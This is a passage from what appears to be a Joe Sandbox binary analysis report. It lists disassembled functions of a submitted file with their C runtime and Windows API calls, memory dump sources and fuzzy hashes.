                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2040435927-0
                                                                                                                                                                                                                                                              • Opcode ID: cd2264dfe67d0087d937ae164164c0d6874cc0cb49c38563b7201a03725c7f1c
                                                                                                                                                                                                                                                              • Instruction ID: 2c614fe23f7f0f41710859134b595c9f05bfb1d2f26e6017b55eb98a73f45ebc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd2264dfe67d0087d937ae164164c0d6874cc0cb49c38563b7201a03725c7f1c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A251BD7291021EAFEB209FA0ED45FAB7BB9EB44748F158024F905DA1D4E731ED21CB60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A09787
                                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00A0978F
                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A09818
                                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00A09843
                                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00A09898
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                              • Opcode ID: e8f278fab912d510cf6e736af0471285877178494f9d00ac9fbf03372684df35
                                                                                                                                                                                                                                                              • Instruction ID: a27ce66fd06ded348459336391495235b74d68c9c5566378d3bb852c41bba8d0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8f278fab912d510cf6e736af0471285877178494f9d00ac9fbf03372684df35
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF41AF35A0021DABCF10DF68E884A9FBBB5AF45324F14C165E814AB3D3D7319A55CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00A0396D
                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00A03977
                                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00A0398E
                                                                                                                                                                                                                                                                • Part of subcall function 00A016AA: std::_Lockit::_Lockit.LIBCPMT ref: 00A016BB
                                                                                                                                                                                                                                                                • Part of subcall function 00A016AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00A016D5
                                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 00A039B1
                                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00A039C8
                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00A039E8
                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00A039F5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2133458128-0
                                                                                                                                                                                                                                                              • Opcode ID: 0d81e1a943abdf493f389090e3e6d5f8e0dd7ec2274193fbbf171cf8266d4313
                                                                                                                                                                                                                                                              • Instruction ID: 7a8b7745d33b1ca0bcf4192627fc3f221ec74c09d807b30562b803928463db11
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d81e1a943abdf493f389090e3e6d5f8e0dd7ec2274193fbbf171cf8266d4313
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E11106729002189FCF10EF68E9166AD77B8EF95724F144119E801E72C0DFB19E45CB81
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00A04D3C
                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00A04D46
                                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00A04D5D
                                                                                                                                                                                                                                                                • Part of subcall function 00A016AA: std::_Lockit::_Lockit.LIBCPMT ref: 00A016BB
                                                                                                                                                                                                                                                                • Part of subcall function 00A016AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00A016D5
                                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 00A04D80
                                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00A04D97
                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00A04DB7
                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00A04DC4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2133458128-0
                                                                                                                                                                                                                                                              • Opcode ID: e4d9b230f63cc83b058b235cea601d89c394d5f7fb1cce04777164f7c0b42d30
                                                                                                                                                                                                                                                              • Instruction ID: 2894cf5262119efe3496f5fd0c6a9fc3328cf354702378b9baef4af9765a6443
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4d9b230f63cc83b058b235cea601d89c394d5f7fb1cce04777164f7c0b42d30
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E11E172900219DFCB01EBA8EA016EEBBF4AF44710F24451AE911EB2D1DB71AA01CB81
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00A09941,00A0959A,00A07002), ref: 00A09958
                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A09966
                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A0997F
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,00A09941,00A0959A,00A07002), ref: 00A099D1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                              • Opcode ID: 496cfa00f31d35b41ca5a69faaa6bbd8e49bf848f2f8ab8470c0589830000191
                                                                                                                                                                                                                                                              • Instruction ID: 3c11d1ac055c142cb53b4910f7f011040087f03a0fa667f7c09451d0d03a3935
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 496cfa00f31d35b41ca5a69faaa6bbd8e49bf848f2f8ab8470c0589830000191
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701D43220D71D5EE62467F87D95A6B3BA6EB12BB1B20033EF424451F6EE618C02D242
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,126C9991,?,?,00000000,00A1E2B4,000000FF,?,00A0F26E,00A0F39E,?,00A0F242,00000000), ref: 00A0F313
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A0F325
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,00A1E2B4,000000FF,?,00A0F26E,00A0F39E,?,00A0F242,00000000), ref: 00A0F347
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                              • Opcode ID: 383caf5cf2608ecdb5d3c407af6cf6efa5bf21fea34e9d706e58a7324f9608f8
                                                                                                                                                                                                                                                              • Instruction ID: 9d2325e6e74c07181066233b9f7192de70487e4ba8c9ccd91822e2b1b75d54fb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 383caf5cf2608ecdb5d3c407af6cf6efa5bf21fea34e9d706e58a7324f9608f8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C016735504659FFDB11CB94DC05FEE77B9FB04B24F044535F825A26D0E7749901CA51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00A02340
                                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00A02353
                                                                                                                                                                                                                                                                • Part of subcall function 00A016AA: std::_Lockit::_Lockit.LIBCPMT ref: 00A016BB
                                                                                                                                                                                                                                                                • Part of subcall function 00A016AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00A016D5
                                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00A02386
                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00A0239C
                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00A023A7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                                                                                                                              • Opcode ID: 11d8a14f1885262e99074f2455c5c7e91d854f4ba69586562f1473c2beab881b
                                                                                                                                                                                                                                                              • Instruction ID: 84e29c4d2fbd07eb6b55a99a06ff03ab9c1ab5e8c3d162d023317a017ce917b8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11d8a14f1885262e99074f2455c5c7e91d854f4ba69586562f1473c2beab881b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC01F77290021CABCB15AB94FD099ED7768DF80760F100158F4159F2D0EB359E42CB81
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00A02F0F
                                                                                                                                                                                                                                                              • int.LIBCPMT ref: 00A02F22
                                                                                                                                                                                                                                                                • Part of subcall function 00A016AA: std::_Lockit::_Lockit.LIBCPMT ref: 00A016BB
                                                                                                                                                                                                                                                                • Part of subcall function 00A016AA: std::_Lockit::~_Lockit.LIBCPMT ref: 00A016D5
                                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00A02F55
                                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00A02F6B
                                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00A02F76
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2081738530-0
                                                                                                                                                                                                                                                              • Opcode ID: 6c624bbdb42be781510a336c91b5d1a95c6e38589aef30d29a22a5e141d51ac5
                                                                                                                                                                                                                                                              • Instruction ID: 7e7cf66b71b4c2beb34f7dc5fb272568e0344e51692754059a8296c794802f5c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c624bbdb42be781510a336c91b5d1a95c6e38589aef30d29a22a5e141d51ac5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9701A73290021DABCB15EB98F9099ED7778DF907A0B104159F505AB2D0EA319E46CB80
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 156189095-0
                                                                                                                                                                                                                                                              • Opcode ID: 40df690f627a5e4d04b178ef56edb9839492242c9e2adb56a10f6e10c5b18368
                                                                                                                                                                                                                                                              • Instruction ID: 7d6d0a45a76b00cebcbc6b22b0604161afdea4c46e7bd73c6bfea5193a5e0194
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40df690f627a5e4d04b178ef56edb9839492242c9e2adb56a10f6e10c5b18368
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D017CB6A00118ABCB06EF65EA455BC7BB9FF85B50F148059E801973C1CF34AB47CB96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00A4303D
                                                                                                                                                                                                                                                                • Part of subcall function 00A43214: __getptd_noexit.LIBCMT ref: 00A43217
                                                                                                                                                                                                                                                                • Part of subcall function 00A43214: __amsg_exit.LIBCMT ref: 00A43224
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00A43054
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00A43062
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 00A43072
                                                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00A43086
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                                                              • Opcode ID: ab500465c7949d66768cd5fa76516c7e20d4d04377781581de3136c8911f917d
                                                                                                                                                                                                                                                              • Instruction ID: 54e9344bce079b1d5f8ae02b99161dc54f052bc99cd1f80bbf1bc0d6215c0597
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab500465c7949d66768cd5fa76516c7e20d4d04377781581de3136c8911f917d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95F06D3BA406109BDF61FBA85A06B5976A0AFC0721F604359F514672C2CB685A40CBA6
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00A0AA43,00000000,00000001,00A2A744,?,?,?,00A0ABE6,00000004,InitializeCriticalSectionEx,00A20C90,InitializeCriticalSectionEx), ref: 00A0AA9F
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00A0AA43,00000000,00000001,00A2A744,?,?,?,00A0ABE6,00000004,InitializeCriticalSectionEx,00A20C90,InitializeCriticalSectionEx,00000000,?,00A0A99D), ref: 00A0AAA9
                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00A098B3), ref: 00A0AAD1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                              • Opcode ID: e29266e52098c9e43bb9553983fe98765111103f806204dcea7700e6933f6b1a
                                                                                                                                                                                                                                                              • Instruction ID: 35e494a4715276e0afe542bf595e7ef104f27f72f4768312bfe73b23270f6314
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e29266e52098c9e43bb9553983fe98765111103f806204dcea7700e6933f6b1a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38E01230740309BBEB105BB1FD06B993B55AB20B90F108030F94DE44E2E771D951D595
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(126C9991,00000000,00000000,00000000), ref: 00A13B39
                                                                                                                                                                                                                                                                • Part of subcall function 00A16CD2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A15E00,?,00000000,-00000008), ref: 00A16D7E
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A13D94
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A13DDC
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A13E7F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
